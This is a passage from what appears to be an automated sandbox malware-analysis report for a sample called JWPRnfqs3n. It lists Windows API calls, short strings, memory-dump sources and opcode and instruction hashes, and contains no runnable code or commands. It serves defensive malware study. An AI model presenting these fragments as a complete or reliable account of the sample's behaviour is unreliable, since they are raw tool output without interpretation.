                                                                            • Sleep.KERNEL32(00000000), ref: 00812968
                                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00812981
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                                            • Instruction ID: a50df8cbf0c3047a26835046827e24f69abeccd18e53b6c358d6f808a79342d2
                                                                            • Opcode Fuzzy Hash: 0b3409f7d06df94921f5a9e3a468e1762cc47491fc4d31d6204eb9fd7e2edad3
                                                                            • Instruction Fuzzy Hash: 715147714087449BD760AF18DC86BABBBE8FB85340F41885DF2D9811A2DB708568CB67
                                                                            APIs
                                                                              • Part of subcall function 00804F0B: __fread_nolock.LIBCMT ref: 00804F29
                                                                            • _wcscmp.LIBCMT ref: 00869824
                                                                            • _wcscmp.LIBCMT ref: 00869837
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                                            • Instruction ID: c98faa896b68233360d1e07c34c9aad97f58f66b676087645809b8066644398a
                                                                            • Opcode Fuzzy Hash: ce3894ff41f91208a5e74e8e1964980804d18b6ef30a443043cf4f700f65f94f
                                                                            • Instruction Fuzzy Hash: 0F41A571A4021ABADF209AA8CC45FEFB7BDFF86714F010479FA04E71C1DA75A9048B61
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0087259E
                                                                            • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 008725D4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CrackInternet_memset
                                                                            • String ID: |
                                                                            • API String ID: 1413715105-2343686810
                                                                            • Opcode ID: c2c8a30bf3fc86a6011045d75602b5a584e4aee071f6d24b062b74542b47e04c
                                                                            • Instruction ID: 7b9c244065f6be4588c5b4eb19cffa68487c27703d9bc79245041aa5c0d7e08c
                                                                            • Opcode Fuzzy Hash: c2c8a30bf3fc86a6011045d75602b5a584e4aee071f6d24b062b74542b47e04c
                                                                            • Instruction Fuzzy Hash: 8E314871C00119ABCF51AFA4CC85EEEBFB8FF18350F10405AF908A6166EB319955CB61
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 00886B17
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00886B53
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                                            • Instruction ID: 6dce899856f08c66bd0bf9743f0faf1c6a0c786d3204d1e20e0503bbc9681094
                                                                            • Opcode Fuzzy Hash: 03b72fd6812e03c88699c818fd760af661dc009bf24cdbf12e4cb331d51531ab
                                                                            • Instruction Fuzzy Hash: C1318F71200604AEEB10AF68CC81FFB77B9FF88764F108619F9A5D7191EA31AC91C760
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00862911
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0086294C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: d64b9cc3aa3fa4c81e402a882dbe6e352a9c4c7307d8de186d6f00c4ae5ef9f0
                                                                            • Instruction ID: 945b645b9e53ab4bb5a7af16029f47db0024e0d0a5fa341816d304be5ec18887
                                                                            • Opcode Fuzzy Hash: d64b9cc3aa3fa4c81e402a882dbe6e352a9c4c7307d8de186d6f00c4ae5ef9f0
                                                                            • Instruction Fuzzy Hash: 8C31D531A007099FEB24CF58DC45FAEBFB4FF85350F1900A9E985E61A1DB709984CB51
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 00873A66
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf_memmove
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 3506404897-2584243854
                                                                            • Opcode ID: abce67e574d8fc33e3c0bed9e978ed25d0abc995e7adef815b527841114fc356
                                                                            • Instruction ID: c5fbaab827b3009dc0cf43dafc99e417580f5aec6110ac84a21149813f8ccdfe
                                                                            • Opcode Fuzzy Hash: abce67e574d8fc33e3c0bed9e978ed25d0abc995e7adef815b527841114fc356
                                                                            • Instruction Fuzzy Hash: 0C218471A00529AFCF50EF68CC82AAEB7B9FF44300F404454E559E7285DB34EA45DB66
                                                                            APIs
                                                                              • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                                              • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                                            • GetParent.USER32(?), ref: 0083B7BA
                                                                            • DefDlgProcW.USER32(?,00000133,?,?,?,?,?,?,?,?,008019B3,?,?,?,00000006,?), ref: 0083B834
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$ParentProc
                                                                            • String ID: S
                                                                            • API String ID: 2181805148-2858979982
                                                                            • Opcode ID: 47e08a7c27536e5b34353a5bd703c9b736d25c766710a483b04a276717e6c34e
                                                                            • Instruction ID: 1e4e37a4ec4fde9791a32d60d30c5a29119a5f63dda1161b4e481aa8dff4d1c9
                                                                            • Opcode Fuzzy Hash: 47e08a7c27536e5b34353a5bd703c9b736d25c766710a483b04a276717e6c34e
                                                                            • Instruction Fuzzy Hash: 04219134201108AFCF608B68CC8DEA93BA6FB49334F584264F629DB2F6C771AD51DB50
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00886761
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0088676C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                                            • Instruction ID: 15d8b172d727545093224aeeaa99ad41918be228c7e809af0b74abbfab47d176
                                                                            • Opcode Fuzzy Hash: 2af0c6088f5d52e1abc1e7483ae3206f613dc6ce5aebf1507dd96dcbbd82ed58
                                                                            • Instruction Fuzzy Hash: E3118275200208AFEF21EF58DC81EBB376AFB98368F104229F914D7290E6759C6187A0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: S
                                                                            • API String ID: 0-2858979982
                                                                            • Opcode ID: 6faaafd638327deeb70efb63940715de8d8be35d6dd3b4e1f57d504031a481b9
                                                                            • Instruction ID: 1b764caeeeb278f6b7f9f0b944bd04f157c239b08051783230f00460167e17d7
                                                                            • Opcode Fuzzy Hash: 6faaafd638327deeb70efb63940715de8d8be35d6dd3b4e1f57d504031a481b9
                                                                            • Instruction Fuzzy Hash: EA217F35124108BFEF10BF58CD45FBA37A4FB09324F584165FA92DA1E1D671E950DB60
                                                                            APIs
                                                                              • Part of subcall function 00801D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00801D73
                                                                              • Part of subcall function 00801D35: GetStockObject.GDI32(00000011), ref: 00801D87
                                                                              • Part of subcall function 00801D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00801D91
                                                                            • GetWindowRect.USER32(00000000,?), ref: 00886C71
                                                                            • GetSysColor.USER32(00000012), ref: 00886C8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                            • String ID: static
                                                                            • API String ID: 1983116058-2160076837
                                                                            • Opcode ID: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                                            • Instruction ID: 1107178e453b86fc60d311f446bf538c4156e74682ddfbf771987c39d0d6b5ab
                                                                            • Opcode Fuzzy Hash: b5d995db997e330eabbbf00b8fc4a75482aee9312393d079f7a0c5a190fe698e
                                                                            • Instruction Fuzzy Hash: D7212C72510209AFDF04DFA8CC45EFA7BB9FB08315F004629FE55D2251E635E860DB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMenuPopup
                                                                            • String ID: S
                                                                            • API String ID: 3826294624-2858979982
                                                                            • Opcode ID: e19a5c0b61584e706a11bd85d21decdfa314c711176cc15a484e42ca8110bf95
                                                                            • Instruction ID: e02fec4d2410e9aa2df76b1a729793a02c9aec22654ff3db126b3894f3aa329c
                                                                            • Opcode Fuzzy Hash: e19a5c0b61584e706a11bd85d21decdfa314c711176cc15a484e42ca8110bf95
                                                                            • Instruction Fuzzy Hash: C8215C78500609DFCB20EF28D448B9677F1FB09324F448669E859CB391E731ACA6DF91
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 008869A2
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008869B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: edit
                                                                            • API String ID: 2978978980-2167791130
                                                                            • Opcode ID: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                                            • Instruction ID: 31e41c436ff2208f8e2bf5fb96bbeafddd3375781bd5bd962ca3b7f169b41173
                                                                            • Opcode Fuzzy Hash: 2845d51f1e49105b502820653306b5b8e9c7b26da24303d012891e9c357aa8be
                                                                            • Instruction Fuzzy Hash: 17116D71110109ABEF10AE789C45AAB3BA9FB05378F604724FAA5D61E0E631DCA19760
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00862A22
                                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00862A41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                                            • Instruction ID: 46ec6db68fa4a78ea3f3367f1aab674752d3991eca19be30b84611c36ee0e4ab
                                                                            • Opcode Fuzzy Hash: e723ddb1fc5dd561900e81fb6b5a4131e89c9a4d237017242f8d6ccba93dfb15
                                                                            • Instruction Fuzzy Hash: 5311BE32901928ABCF32DADCD844FEA77B9FB45315F0640A1E995F7290D7B0AD0AC791
                                                                            APIs
                                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0087222C
                                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00872255
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: Internet$OpenOption
                                                                            • String ID: <local>
                                                                            • API String ID: 942729171-4266983199
                                                                            • Opcode ID: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                                            • Instruction ID: b33e5d08903113da7b63970423af129978f3aa2c42c22ba22095df78d5938e7f
                                                                            • Opcode Fuzzy Hash: 5b73cb5e25a93eb767afe9fa41986ade5b3d8f1bcde30b86554af83c70fd805d
                                                                            • Instruction Fuzzy Hash: 0011E070511225BADB248F158C84EBBFBA8FF0A355F10C22AFA28C6101D270E990D6F0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,?,?,?), ref: 00888530
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: S
                                                                            • API String ID: 3850602802-2858979982
                                                                            • Opcode ID: 00cd3d4b995b20ef6c171aa57cf9a82ed633167499480a734beda61b2c24d1c2
                                                                            • Instruction ID: 12b2fe9ad84c0cbf59094e0e086520957ba82439c363fa5b0484b5a2e78bdb1f
                                                                            • Opcode Fuzzy Hash: 00cd3d4b995b20ef6c171aa57cf9a82ed633167499480a734beda61b2c24d1c2
                                                                            • Instruction Fuzzy Hash: AB21B375A00209EFCB15EF98D844CAA7BB5FB4C354B504259FE06E7360DA31AD61DBA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: S
                                                                            • API String ID: 0-2858979982
                                                                            • Opcode ID: 73490215817c0ad6b923e9eb6279e207ccd3c01153d180058bdeda9c941ab5b8
                                                                            • Instruction ID: c38887d724bdd1c3e4a32d88b362f4ae1ffbdb64cbe6aaa31b2b6aae0f3d87f5
                                                                            • Opcode Fuzzy Hash: 73490215817c0ad6b923e9eb6279e207ccd3c01153d180058bdeda9c941ab5b8
                                                                            • Instruction Fuzzy Hash: 1B112B75600604AFCB20DF28CC41E957BE6FB99320F158669FA699B3A0C771F940CF90
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00858E73
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 50dff9b840ce59c0d7ae77cfad9374b1e6836a410461995d08c2795fc370ae23
                                                                            • Instruction ID: e773fe5065edadea0a259f61bbd1b943a1051c5f8fe9bdab1bf94eea36c6ac39
                                                                            • Opcode Fuzzy Hash: 50dff9b840ce59c0d7ae77cfad9374b1e6836a410461995d08c2795fc370ae23
                                                                            • Instruction Fuzzy Hash: 69019271A01229ABCB15EBA8CC568FE7769FF46320B540A1AFC35E73D1EE35580CC661
                                                                            APIs
                                                                              • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                                              • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00858D6B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1330919557.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                                                            • Associated: 00000005.00000002.1330802954.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.000000000088F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331370231.00000000008B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331819250.00000000008BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1331895856.00000000008C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_800000_JWPRnfqs3n.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 372448540-1403004172
                                                                            • Opcode ID: 1d56e076bc8e61f086de7d33665b4c51579bc06000d37699cefd6e31c63536f8
                                                                            • Instruction ID: ee137e3bb6b21752acffe6c2947d498fcbae0b508b970491c729687f76e0de8d
                                                                            • Opcode Fuzzy Hash: 1d56e076bc8e61f086de7d33665b4c51579bc06000d37699cefd6e31c63536f8
